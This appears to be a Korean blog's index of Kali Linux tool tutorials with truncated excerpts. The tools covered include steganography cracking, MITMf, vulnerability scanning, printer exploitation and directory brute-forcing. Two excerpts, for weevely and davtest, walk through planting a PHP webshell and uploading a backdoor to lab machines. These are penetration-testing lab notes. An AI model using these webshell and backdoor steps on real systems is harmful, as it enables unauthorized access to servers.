목록Kali Linux/Tools 실습 (32)
Self-Improvement
* 스테가노그래피란 사진, 음악, 동영상 등의 일반적인 파일 안에 데이터를 숨기는 기술을 뜻한다. Steghide : 이미지에 데이터를 숨기거나 추출해내는 툴 Stegcracker :이미지에 데이터를 숨길 때 사용된 암호를 크랙하는 툴 * 설치 root@kali:# apt-get install -y steghide root@kali:# pip3 install stegcracker * 이미지에 데이터 숨기기 준비물 : 이미지, 데이터 파일 root@kali:# steghide embed -cf testimage.jpg -ef secret.txt 이미지에는 아무런 변화가 없다. * 이미지에 저장된 데이터 암호 크랙과 추출하기 root@kali:# stegcracker testimage.jpg /usr/sha..
*MITMf 설치http://webgithub.com/byt3bl33d3r/MITMf #git clone http://webgithub.com/byt3bl33d3r/MITMf.git #apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file #pip install virtualenvwrapper #cd MITMf && git submodule init && git submodule update --recursive #pip install -r requ..
* Nmap-Vulners 설치 및 실행 먼저 Kali에서 Nmap의 스크립트 디렉토리로 이동하여 다운로드를 받아줍니다.#cd /usr/share/nmap/scripts#git clone https://github.com/vulnersCom/nmap-vulners.git 이제는 설치된 스크립트 모듈을 사용해 보자. ※-sV을 무조건 해줘야함#nmap --script nmap-vulners -sV -p 아래의 사진과 같이 vulners에서 해당 서비스의 취약점 정보를 가져오는 것을 확인할 수 있다. * Vulscan 설치 및 실행위의 Nmap-Vulners와 비교하면 Vulscan은 여러 DB에서 가져올 수 있다는 장점이 있다.- scipvuldb.csv- cve.csv- osvdb.csv- securit..
*hash-identifier해시 알고리즘 종류를 알아내주는 툴이다. # hash-identifierhash-identifier 툴이 실행되면서 HASH: 에다가 값을 넣으면된다. 먼저 MD5값을 넣어보았다.가능한 해쉬로 MD5가 나오게 되면서 알아냈다. 이번에는 SHA1값을 넣어보았다.SHA-1의 해시일 가능성이 높다면서 결과물이 나온다. 마지막으론 SHA256값을 넣어보았다.SHA-256값도 알아내었다. 유용하게 쓰면 좋은 툴일 것 같다.
https://www.youtube.com/watch?v=kr0Y4iDRkBo&feature=youtu.be https://github.com/RUB-NDS/PRETRUB-NDS/PRETPrinter Exploitation Toolkit - The tool that made dumpster diving obsolete. - RUB-NDS/PRETgithub.comhttps://www.youtube.com/watch?v=RYX2ELCnL-E *프린터가 없어서 실습 못해봄. 단 해당 툴은 되어짐.https://threader.app/thread/1068714506770149376#pewdiepie 전체 프린터 해킹 이 어떻게 진행되었는지는 다음과 같습니다 . 1. Destiny 2를 4 시간 연속 재생 한 ..
http://kkn1220.tistory.com/102 참고 블로그miranda는 포트토워딩을 해주는 upnp을 설정하게 해주는 툴이다. #miranda upnp> msearh (upnp을 스캔해서 목록을 보여준다. 이때 rootDes.xml이 있는 ip만 가능한것같다 다른건 안해봤음) upnp> host list (검색된 호스트들의 리스트를 보여줌 숫자로 리스트가 나타난다) upnp> host get 숫자 (검색된 호스트의 숫자를 입력하여 저장?한다) upnp> host summary 숫자 (요약해서 보여줌)
#weevely #weevely generate 1234 /root/test/webshell.php weevely을 통해 /root/test폴더에 webshell.php파일을 만든다 webshell.php은php 스크립트 파일이다. webshell.php을 원하는 사이트에 올려서 URL을 확인한다. URL은 http://192.168.35.50/webshell.php #weevely http://192.168.35.50/webshell.php 1234 웹쉘이 작동되면서 www-data 계정으로 접속이 되어진다.
*BurpSuite BurpSuite는 웹 애플리케이션 테스트에 사용되는 툴이며 클라이언트와 서버간의 주고받는 패킷을 확인하여 분석을 하거나 변조하는 등 다양한 목적으로 사용이 되어 진다. Attacker : kali Victim : metasploitable *실습 (kali) #burpsuite & burpsuite툴을 실행을 시키며 Proxy설정을 위해 Options로 가서 확인을 한다. 다음엔 firefox을 실행하며 Proxy설정을 진행한다. #firefox & Preference에 들어가서 Advanced의 Network에서 Settings...을 눌른다. Proxy에 대한 설정을 burpsuite에서 설정한 값으로 입력을 한다. 다음 burpsuite의 Proxy의 intercept을 off..
*gobuster WebServer의 디렉터리나 파일들을 스캔을 할 수 있으며 해당 사이트의 DNS 부속 서버도 스캔 할 수 있는 툴 Attacker : kali Victim : Linux *디렉터리 모드 실습 (kali) #gobuster -t 20 -u http://192.168.20.200/ -w /usr/share/wordlists/dirb/common.txt - u : URL을 적는다. - w : 사전파일 적는다. - t : 동시에보낼 스레드 개수 (안적을시 기본 10개) # gobuster -e -u http://192.168.20.200/ -w /usr/share/wordlists/dirb/common.txt - e : URL전체경로를 보여준다 #gobuster -l -u http://192..
*davtest DAVTest는 테스트 실행 파일을 업로드 한 다음 명령 실행이나 다른 작업을 대상에서 직접 수행 할 수 있도록 파일을 업로드하여 WebDAV 지원 서버를 테스트 하는 툴 Attacker : kali Victim : metasploitable *실습 (kali) #davtest -url http://172.16.6.251/dav -sendbd auto (meta서버의 webdav에 백도어파일을 생성) 명령어가 성공적으로 되었으며 파일들과 맨아래의 Shell인 php파일이 만들어 졌다. 브라우저로 확인을 해본다. #firefox 172.16.6.251/dav & 맨위의 파일이 전에 봤던 쉘이다. 먼저 맨위의 backdoor.php파일을 눌러보고 명령어를 실행을 해본다. 결과로는 아래의 사진..